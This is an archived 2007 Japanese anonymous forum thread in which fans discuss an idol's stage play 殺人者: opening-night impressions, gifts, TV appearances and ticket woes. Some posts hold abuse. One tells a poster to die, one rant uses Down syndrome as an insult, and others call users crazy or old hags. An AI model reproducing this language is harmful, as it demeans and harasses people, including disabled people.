160 :ななしじゃにー:2007/02/19(月) 22:01:20 ID:4yPVmuAu
記念品引き換えはどうだった?
身分証明のチェックの有無と同行者も貰えたかどうか教えて下され

161 :◆.byy5ZG6d2 :2007/02/19(月) 22:06:56 ID:6Y29I3Uh
見たお。
でも一回じゃ難しかったもん(´・ω・`)
雨が来るも二回見て色々わかったもん(´・ω・`)

162 :◆.byy5ZG6d2 :2007/02/19(月) 22:10:00 ID:6Y29I3Uh
ネタバレ




☆タンの役はゴミ出ししてたお(・∀・)

163 :ななしじゃにー:2007/02/19(月) 22:12:42 ID:PR2OpoD2
>159
乙!進海丸に引き続き休憩なしか。
2時間ちょいの公演ならその方がリズムよくていい。
内容は二万以来の難解系ktkr!?楽しみだ〜

164 :ななしじゃにー:2007/02/19(月) 22:13:28 ID:s0SdY+Kt
記念品は何だった?

165 :ななしじゃにー:2007/02/19(月) 22:16:32 ID:V3DfEL1Q
演技自体はどうだったのかな
怪我なんかが無さそうで良かった良かった…
後は、凸経由wの風邪が完治してる事を祈ります

楽しんだ姐さん乙

166 :ネタバレ?:2007/02/19(月) 22:30:33 ID:Qr+igmvy
初日観てきた。
とりあえずビジュ良好だったのでコンディションも悪くないのではないかと。
記念品はチケット見せるだけでもらえる。



内容は難解だが、赤堀作品らしいと思った。
個人的感想ですが、☆と赤堀さんと松本さんの演技が光ってたように思いますた。

167 :ななしじゃにー:2007/02/19(月) 22:36:26 ID:2kfNTmo3
>166
d!



赤ホリさんも舞台に上がるのか。
今回は脚本演出のみかと思ってた。

168 :ななしじゃにー:2007/02/19(月) 23:18:35 ID:B8pVYFPy
>167
それはネタばれでも何でもなく、
公式の出演者欄にも思いっきり名前がある訳だがw
赤堀さんは自分で書いたものによく出演してるよ。

169 :ななしじゃにー:2007/02/19(月) 23:43:27 ID:R4DYXYkE



演技者の世界に近いような?
観終わって感じたことは「疲れた・怖い」だな。自分はスチだ。

170 :ななしじゃにー:2007/02/19(月) 23:56:28 ID:lLFwn+fB



今回はかなり難解系だと思う。
こうこうこういう話、と直ぐにはピンと来ない。
でも、何だか家に着いたら色々思い出して切ない気分になった…

171 :ななしじゃにー:2007/02/20(火) 00:14:58 ID:ODfZhLOA
>169
>観終わって感じたことは「疲れた・怖い」だな。

同意。すげー噛みごたえがある芝居。
でも自分は難解だとまでは思わなかったな。
☆の伝え方が今までで一番素直で直球だったように感じた。
☆は初舞台があの二万だったから難解系にも慣れたのかもしれないが。
解釈に差が出そうで面白いと思うよ。
☆の芝居に関しても、初日であそこまでできてるのはさすがの舞台4作目。

壷だし辛口毒舌で意見したかったんだが、今回はむりぽ
甘くてごめんw

172 :◆.byy5ZG6d2 :2007/02/20(火) 00:15:05 ID:pZEdrAke
ネタバレ





心の闇・゜・(ノД`)・゜・

173 :◆.byy5ZG6d2 :2007/02/20(火) 00:20:13 ID:pZEdrAke
今日は結末知ってから見るから楽しみだお(*´∀`*)

174 :ななしじゃにー:2007/02/20(火) 00:21:09 ID:Gj/ss8RQ



>169-171
乙!
早く観たいなー
そして悩みたいw

175 :◆.byy5ZG6d2 :2007/02/20(火) 00:25:52 ID:pZEdrAke
ネタバレ




秋野パパンのニラとか大谷ママンの頭消しゴム面白かった(・∀・)

176 :ななしじゃにー:2007/02/20(火) 00:42:29 ID:Ulym4JoP
ちょww ☆www ブーメラン紺てwwwwww
ブーメランパンシ重ね履きテラミタスw
6人ブーメランでの蜂拍子さらにミタスw

舞台話中豚切りスマソ。

177 :ななしじゃにー:2007/02/20(火) 01:30:08 ID:9NQKKQGh
>175
こんな日だから、今迄あえて言わなかったけど聞く。
頼むから消えてくれないか?
何年もスルーされ続けてもやり続けてるのはなんで?
☆が好きなら空気嫁よ。
なんで叩かれても叩かれても鏝半続けるのか教えてくれ。
目立ちたいだけなんだったら、今すぐ消えてくれ。
せっかくの初日なのに、他☆担の気分を害しないでくれ。

嗚呼、自分が空気読めない感じですまん…orz

178 :ななしじゃにー:2007/02/20(火) 01:44:03 ID:w1FtLTup
コンディションは良さそうだった。
いつもは稽古中に喉を潰してる感じだったが
今回は声も良く出て滑舌もイイ。

なんというか…何回も噛めば味が出てくるというか…。
自分は結構じんわり来た。





また泣いてるyo

179 :ななしじゃにー:2007/02/20(火) 01:50:15 ID:P0VK3Rhp
>177
スルーでヨロ

>178
乙です
初日から声と滑舌GJなのは嬉しいことだな
最後の一文を読んで更に楽しみ度が増したw

180 :ななしじゃにー:2007/02/20(火) 01:50:55 ID:uVbfGu5+
秋野さんって金八で風間のお父さん役だった人だよな?


181 :ななしじゃにー:2007/02/20(火) 07:21:23 ID:ay7rMxA4
ズームに☆出るかも

ガイシュツだったらスマソ

182 :ななしじゃにー:2007/02/20(火) 07:47:34 ID:aopzyomA
☆本人?

183 :ななしじゃにー:2007/02/20(火) 07:49:43 ID:ay7rMxA4
>182
新聞に武威☆と書いてあったよ

184 :ななしじゃにー:2007/02/20(火) 08:00:36 ID:eJZCXuCR
終わったから聞いていいかな?
帝都ズーミンは6時台でしたか?7時台かすりもしていないような。
今のトコロ鯱でWS確認したのは
おめざめ、どですか、芸能サプリだけだ

185 :ななしじゃにー:2007/02/20(火) 08:05:20 ID:6nWalDZ7
今かえって来てパンフ全部読み終わったがやぱ内容難しすorz
でもじわじわ来るものがあって早くもう一回見に行きたい感じだよ。なんか着目しやきゃいけない事が多過ぎて一回目じゃ全部見切れない
集中力いる舞台だな
やっば感想は姐サン方と同じく「疲れた、怖い」が一番合うね〜
長文スマソ

186 :ななしじゃにー:2007/02/20(火) 08:13:36 ID:FmZDIHXt
>184
ズーミンは6時台だったよ。
その後、家出てしまったからサプリ捕獲できてると良いのだが。
大抵一番真面目に内容取り上げてくれるしね。

187 :ななしじゃにー:2007/02/20(火) 08:19:07 ID:eJZCXuCR
>186
d
安心してズーミン消して出かけられる(w
サプリは1番記事だったが心なしか主役より共演者さんのインタのほうが多かった
舞台内容を一番長い時間流してくれたのはやはりネ申だった

188 :◆.byy5ZG6d2 :2007/02/20(火) 08:59:39 ID:pZEdrAke
もはよう(・∀・)ノシ

189 :ななしじゃにー:2007/02/20(火) 09:14:31 ID:JkkBXFyh
>185
乙!やぱ内容難しいのかー。
パンフはネタバレあり?観劇前に読まない方がいい?


190 :ななしじゃにー:2007/02/20(火) 09:47:29 ID:6nWalDZ7
>189
んージブン的にはパンフにネタバレ要素はそんなにないと思ったかな
寧ろ先に読んどいた方が良いかとw☆は勿論、赤堀さんのところは特に!

191 :ななしじゃにー:2007/02/20(火) 10:01:43 ID:nTqTBZ6Z
>189
>190姐さんが答えてくれてるが追加。

一度のみの観劇で難解系に弱い人は読んでおいた方がいいかも。
舞台パンフは通常は先に読んでまずいような作りにはなってないが、
複数回観劇できる人なら一回目はまず出演者の舞台解釈を全く入れずに
自分の感覚だけで観てみるのも例え全部理解できなくても楽しみ方の一つだとオモ。

192 :ななしじゃにー:2007/02/20(火) 15:31:18 ID:uVbfGu5+
石田ひかりさんのブログに☆からの差し入れの写真が載ってる


193 :ななしじゃにー:2007/02/20(火) 17:00:56 ID:uVbfGu5+
「kizashi」で83位に『殺人者』がある


194 :ななしじゃにー:2007/02/20(火) 17:18:54 ID:ENkhqHX1
レポ乙!です
とりあえず一時間前に会場入り、と…メモメモ

120分休憩なしか
週末参加だが禿楽しみだ

195 :ななしじゃにー:2007/02/20(火) 18:29:05 ID:ux+5jZLB
メッセージビデオと特典受付が劇場入口手前に移動。
メッセージ、音量が小さくて☆がなんて言ってんのか聞き取れない!
映像だけでも十分カバエエが。

196 :ななしじゃにー:2007/02/20(火) 19:03:06 ID:prFY4KD7
関西でもズーミンで☆やった?
早送りして探してるからか3回みてもみつからねーんだが

197 :ななしじゃにー:2007/02/20(火) 19:27:38 ID:o08PFt2Z
関西は☆が出てた時間帯、ローカルに切り替わってたモヨン

198 :ななしじゃにー:2007/02/20(火) 20:17:19 ID:PfFtvxqF
フライヤーは置いてある?
これも早めに行かないといつもなくなるよね。

199 :ななしじゃにー:2007/02/20(火) 21:02:57 ID:6nWalDZ7
フライヤー初日は数枚しかなかたよorzすぐ入って真っすぐ行ったけどダメだた

200 :ななしじゃにー:2007/02/20(火) 21:23:55 ID:AzCDuonS
今日は番長来たの?

201 :ななしじゃにー:2007/02/20(火) 21:27:57 ID:Bzg60QY6
なに期待してんだか。

202 :ななしじゃにー:2007/02/20(火) 21:35:38 ID:E5cMoe5G
終わった。
本当「疲れた、恐い」がぴったりな芝居だったな。
寝る前とかに噛み締めるんだろう。

ネタバレ?










「僕と一緒に時間潰しませんか」の☆の笑顔が逸品だった。

203 :ななしじゃにー:2007/02/20(火) 21:42:31 ID:TLGnIyI8
開場は30分前じゃないか?
自分のチケ、開場時間が開演30分前になってるが
1時間前に変更になったのかなぁ?

204 :ななしじゃにー:2007/02/20(火) 21:53:19 ID:ubCnf30q
そういえば昨日のカテコでおきた笑いはなんだったの?見えなかったんで。

205 :ななしじゃにー:2007/02/20(火) 21:57:32 ID:Lzl8cMpk
ネタバレというか、感想?























自分は怖く無かった。
むしろ今病んでいるので、共感して癒されたのち、
ワクワクしてしまった
…てか、あの雪、本物?

206 :ななしじゃにー:2007/02/20(火) 22:56:02 ID:2+1sRtis
ネタバレ







まずは☆最高。
>205と同じで怖くなかった。難しくもなかった。
自分は病んでるつもりはないんだが…病んでるのか?w
癒されたっていうか、確かに人殺しは起きてるんだけど
救いがない事はこの世にはないっていうか。
苦しくても悩んでもわからなくても人はマサルみたいに生きるんだろうと思う。

207 :ななしじゃにー:2007/02/20(火) 23:12:22 ID:fzo4+Fde
見てきました。
ネタバレ?






自分はスゲー胸が苦しくなった。ずっと引きずりそう。
>206の言う救いを感じることができなかった。
逆にどこまでも無情で、やり場のないモヤモヤがずっと残っている感じ。
ホント、人それぞれだね。
そんな中で☆の優しい兄貴っぷりがイイ!
パンフは観劇後に読んだけど、今回1回だけの観劇予定だったから
最初に読んどきゃよかったとオモタ。後半のチケ探すかなー。

208 :ななしじゃにー:2007/02/20(火) 23:57:25 ID:rJGCwXMg
ネタバレ






☆のお兄ちゃんっぷりに萌えw
赤堀さん曰く、☆に感じる凛とした姿勢が
救いの様でもあり悲しみの様でもあり
自分、気がつけばまたしても☆に泣かされてた。
とりあえず、観劇回数増やす予定。

209 :◆.byy5ZG6d2 :2007/02/20(火) 23:57:26 ID:pZEdrAke
イーモリミー(*´∀`*)気になる紋

210 :ななしじゃにー:2007/02/21(水) 00:45:07 ID:nUwPKgjd
>203
ややこしいけど、劇場内に入れるのがチケットに書いてある開演30分前。
グローブ座に入れる=ロビー開場は一時間前。
コメントが見れるのはロビーだよ。


211 :ななしじゃにー:2007/02/21(水) 03:01:05 ID:33+XoAYg
>199
198ではないがサンクス。
今回のフライヤー禿好きだから欲しいんだけど、早く会場入りしてももうないのか…

週末参加組なんだが、姐さん達の感想を読んでるとワクテカが止まらないよ。
いろんな解釈があって面白いな〜
早くこの目で見たい。

212 :ななしじゃにー:2007/02/21(水) 03:23:57 ID:uClTUlJ1
ネタバレ?






最初の正江との会話でセリフ飛ばしてたな。
なんか初日とは違う妙な緊張感があったからドチドチしたけど
後半は落ち着いて観られた。

>204
最後にはける時にちょっと悩んでセットの松田家のドアから帰って行った。
今日も最後にやってたからデフォになるのかな。



213 :ななしじゃにー:2007/02/21(水) 09:12:49 ID:Vqzpd+XO
バレ?






記念品の裏のハンコの写メを友に送ってもらった。
☆すげーよ。あれ手にしたら目汁出そう。
しかし自分はたこやき参加なんだけど、
今回蛇波枠で全滅してしまって三日間とも一般で取ったチケorz

214 :ななしじゃにー:2007/02/21(水) 11:31:11 ID:WEN45X6o
>211なくても係の人に聞いたらくれるかも知れんよ。
舞台じゃないけど、紺で言ったらもらえたことがあった。

215 :ななしじゃにー:2007/02/21(水) 12:59:46 ID:s2Sd++pJ
>213
そうなんだよね
一般でしか入れない☆担姐さんは少なくないんだよね
自分複数枚手に入るから周りの担に配ろうと思ってる

216 :ななしじゃにー:2007/02/21(水) 17:23:02 ID:Vqzpd+XO
>215
優しいな。
自分の場合は周りにジャニヲタが皆無なもので
チケも一般でしか確保できなかったのも仕方ないんだけど、
他担でも☆カードを複数手にしてる人もいると思うと裏山すぎて禿げそう。
これじゃ単なる妬みだよな…。つい愚痴っぽくなってごめん。

217 :ななしじゃにー:2007/02/21(水) 17:35:10 ID:iDHlFvX1
そんなに嘆くんだったら掲示板で蛇波枠のチケ譲ってもらえば?

218 :ななしじゃにー:2007/02/21(水) 17:51:17 ID:UCyZiooy
webチケ譲ってもらうもいいし、記念品自体そのうち奥に出るだろ。
ルートは1つじゃないって分かってるくせに、何をカマトトぶってるんだか。

219 :◆.byy5ZG6d2 :2007/02/21(水) 17:55:50 ID:Nh1Qdhra
カルチウムないの?(´・ω・`)

220 :ななしじゃにー:2007/02/21(水) 17:58:44 ID:3OHdiV6E
オメーは出てくんな
つうか死ね。今すぐ死ね。

221 :◆.byy5ZG6d2 :2007/02/21(水) 18:13:40 ID:Nh1Qdhra
そんなこと言っちゃダメでつ(`・ω・´)
☆タンも☆タン舞台も悲しむお(´・ω・`)

222 :ななしじゃにー:2007/02/21(水) 18:49:33 ID:smy5S4vz
>220
IDの魅力が半減だ


223 :ななしじゃにー:2007/02/21(水) 18:54:01 ID:m2MFZZR8
>210 遅くなりましたがd!

当日は早めに行ってみるよ。

224 :ななしじゃにー:2007/02/21(水) 20:25:15 ID:4X45GaY9
嘆くだけの厨もしつこい鏝もいらないが
辛口ぶったウマシカか煽りなのか知らないが>218みたいな寒いレスは何がしたいんだろ

225 :◆.byy5ZG6d2 :2007/02/21(水) 23:05:06 ID:Nh1Qdhra
(´・ω・`)

226 :ななしじゃにー:2007/02/22(木) 00:33:12 ID:vfebiLRC
45:02/22(木) 00:13 wnu/Maon [sage] 2/21「ひばり」ソワレ 三宅健、中村勘三郎、長塚圭史、安藤和津

227 :ななしじゃにー:2007/02/22(木) 01:34:55 ID:2arbM0pj
45:02/22(木) 00:13 wnu/Maon [sage]
2/21「ひばり」ソワレ
三宅健、中村勘三郎、長塚圭史、安藤和津
4


228 :ななしじゃにー:2007/02/22(木) 01:36:14 ID:2arbM0pj
45:02/22(木) 00:13 wnu/Maon [sage]
2/21「ひばり」ソワレ
三宅健、中村勘三郎、長塚圭史、安藤和津


229 :ななしじゃにー:2007/02/22(木) 01:45:23 ID:2arbM0pj
43:02/21(水) 23:46 ThDfe2pz [sage]
20日「殺人者」に若槻千夏


230 :ななしじゃにー:2007/02/22(木) 09:53:21 ID:YVJTGhs4
早くも記念品が奥に出てるね
50円スタートだってさ

231 :ななしじゃにー:2007/02/22(木) 10:27:27 ID:T7d9LmXG
50円ってあなた!
スタート価格と言えども安すぎる。
っていうか、☆の気持ちを売ろうとするなんて…

232 :ななしじゃにー:2007/02/22(木) 11:02:52 ID:+fnwNxSD
人には人それぞれの価値観があるからな。
>216姐さんみたいな人も入手出来て良いんじゃないか?
自分は今回来られない地方の☆担友にあげた。

233 :ななしじゃにー:2007/02/22(木) 11:02:57 ID:YVJTGhs4
ちなみに進海丸の時の記念品は何?


234 :ななしじゃにー:2007/02/22(木) 11:06:25 ID:EYyYLmna
石橋ババアの醜い顔    ダウン症


ババアって言わないで   哀れな人生

わたしはババアじゃないんだ       いじめられっこじゃない

   ああああああああああああああああ

石橋ババアの醜い顔    ダウン症


ババアって言わないで   哀れな人生

わたしは化け物じゃないんだ       いじめられっこじゃない

   ああああああああああああああああ



ああああああああああああああああああああああああああああああああ




235 :ななしじゃにー:2007/02/22(木) 14:34:10 ID:JCmuRTjO
奥話するゴキは巣に帰れ

236 :ななしじゃにー:2007/02/22(木) 14:43:13 ID:uBYDN9WY
>216じゃないが自分も一般チケしか持ってないけど
奥売りするような奴から買おうとは思わないな。
カマトトwぶってるんじゃなくて、そういう形で欲しい訳じゃないし。
一般チケだって自分が行くつもりで確保したんだから自分で見に行く。
人それぞれの価値観だがな。

237 :ななしじゃにー:2007/02/22(木) 15:06:05 ID:Ql4jIEto
価値観て便利な言葉ですねw

238 :◆.byy5ZG6d2 :2007/02/22(木) 15:29:07 ID:GdCa1oVr
今日も☆タンは舞台だお(・∀・)


239 :ななしじゃにー:2007/02/22(木) 17:41:24 ID:2arbM0pj
50:02/22(木) 07:36 N/QjBe1Y [sage]
2/19「殺人者」ソワレ
松本幸四郎


240 :ななしじゃにー:2007/02/22(木) 18:36:07 ID:ocvTeAh3
鏝も優等生も奥情報もイラネ。
しばらく芝居の感想だけでいいよ。

241 :ななしじゃにー:2007/02/22(木) 18:37:24 ID:WUkcqKZa
演劇板のスレも忘れないでやってください…
閑古すぎるw

242 :ななしじゃにー:2007/02/22(木) 19:43:17 ID:RIoigbYi
芝居の感想は舞台スレでやればいいんじゃないの?
☆の仕事は舞台だけじゃないんだし。

243 :◆.byy5ZG6d2 :2007/02/22(木) 21:39:51 ID:GdCa1oVr
この板に☆タン舞台スレはないお(´・ω・`)

244 :◆.byy5ZG6d2 :2007/02/22(木) 21:51:33 ID:GdCa1oVr
240の中の人は現実逃避してるのでつか(´・ω・`)?

245 :ななしじゃにー:2007/02/22(木) 23:08:18 ID:ZShf5/nI
お前がどっか逃避しろよ。
イヤがらせもほどほどにな

246 :◆.byy5ZG6d2 :2007/02/22(木) 23:14:02 ID:GdCa1oVr
つカルチウム

247 :ななしじゃにー:2007/02/22(木) 23:31:21 ID:xKLk5X3Y
☆にアーンしてもらえるならわさび大盛り一匙だろうが余裕で逝けるんで
ちょっと自分と代わって欲しいw

なんて思った夜

248 :ななしじゃにー:2007/02/22(木) 23:33:17 ID:KnrXTKpT
酒乱よ、カコヨスカワユスな☆をありがとう


249 :ななしじゃにー:2007/02/22(木) 23:34:00 ID:2arbM0pj
http://hobby9.2ch.net/test/read.cgi/drama/1171641881/


250 :ななしじゃにー:2007/02/22(木) 23:47:27 ID:JCmuRTjO
リ●コ姉は少し苦手なんだが、
あの姉さんじゃないとあそこまで暴露してもらえなかったと思うと姉さんGJ!
☆って本当にカコイイ日本男子だな。

251 :ななしじゃにー:2007/02/22(木) 23:54:02 ID:t7GOXkz/
まぁ堅いこと言えば、苦渋の決断なわけだから
考え直せとかガンガン言われても困るだろうがな

252 :ななしじゃにー:2007/02/23(金) 00:03:10 ID:lPN6uuPg
>251
困るかどうかはリカコ本人が感じる事だと思うよ。

☆みたいに言ってくれる人は今の時代珍しいだろうな。

253 :ななしじゃにー:2007/02/23(金) 00:09:24 ID:MDoYfr6K
リカコも
私は離婚したくないんだけど〜
って言ってたけどね

254 :ななしじゃにー:2007/02/23(金) 00:10:52 ID:pFd1HYiG
>252
同意
少なくともリカコ姐さんは☆が自分の変化に気付いてくれて
親身になって話に乗ってくれたのが嬉しかったから
ああやって話してくれたんだろうしね

花粉症もそんなに酷くないみたい?
ビズもよかったし満足だ

255 :ななしじゃにー:2007/02/23(金) 02:20:07 ID:jUmd++3Y
最近某麺に物凄い基地が電波放ちまくって凸してるから、
鏝基地が済みついてるここもヤバそうだな。
まず鏝半居る時点で☆の基地外磁石だけどさ…('A`)

256 :ななしじゃにー:2007/02/23(金) 02:24:27 ID:sCk4wxDb
暴露されて照れてる☆にモエー
最近ホントに☆好きでよかったとしみじみ実感してるw

257 :ななしじゃにー:2007/02/23(金) 02:25:05 ID:jUmd++3Y
失礼。
>☆も基地外磁石認定と書きたかった。
2000年の悪夢知ってるオバでしょ、あの鏝半ババァは。


258 :ななしじゃにー:2007/02/23(金) 07:40:34 ID:q9vA59Ew
酒乱、リカコ姐さんに第一声から誉められてほんのり嬉しげな☆萌え
そのあとに続いたエピ選択にビックリの☆萌え
本気で照れてる☆に更に萌え



裏ワザ披露での悪魔な☆にも萌え

259 :◆.byy5ZG6d2 :2007/02/23(金) 07:50:43 ID:nY6ysS0c
モエモエでつ(*´∀`*)

260 :ななしじゃにー:2007/02/23(金) 09:14:13 ID:1JjA5g/I
本当に☆って男前だよな。
何といっても男らしいのにベースに優しさと思いやりがあるところがええ。
しかしリカコ姐さん、「弟の第一条件」は☆が基準になっていないか?w
大人な漢な反面、ワッキーを弄りたくて仕方が無い子供★にも萌え。

261 :ななしじゃにー:2007/02/23(金) 10:44:48 ID:1oNr0geD
>256>258>260
心から同意。
最近の酒乱はなかなか(・∀・)イイ!!
ワッキーも麺紹介の時から☆に絡んできてくれて好感度うpw

262 :ななしじゃにー:2007/02/23(金) 10:57:20 ID:q4kCvNTS
昨日の酒乱見てから、今週の伊東家見たら
☆の髪が伸び放題でワロタww

263 :ななしじゃにー:2007/02/23(金) 14:37:02 ID:IywIhs5j
高麗屋のブログに☆の名前あり


264 :ななしじゃにー:2007/02/23(金) 20:28:53 ID:4wqeYeTg
>>263
父?長男?長女?次女?

265 :ななしじゃにー:2007/02/23(金) 21:21:57 ID:nuTCGT4c
裕太のブログに舞台の感想あり。
昨日は裕美さんも来てくれてたんだな。

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)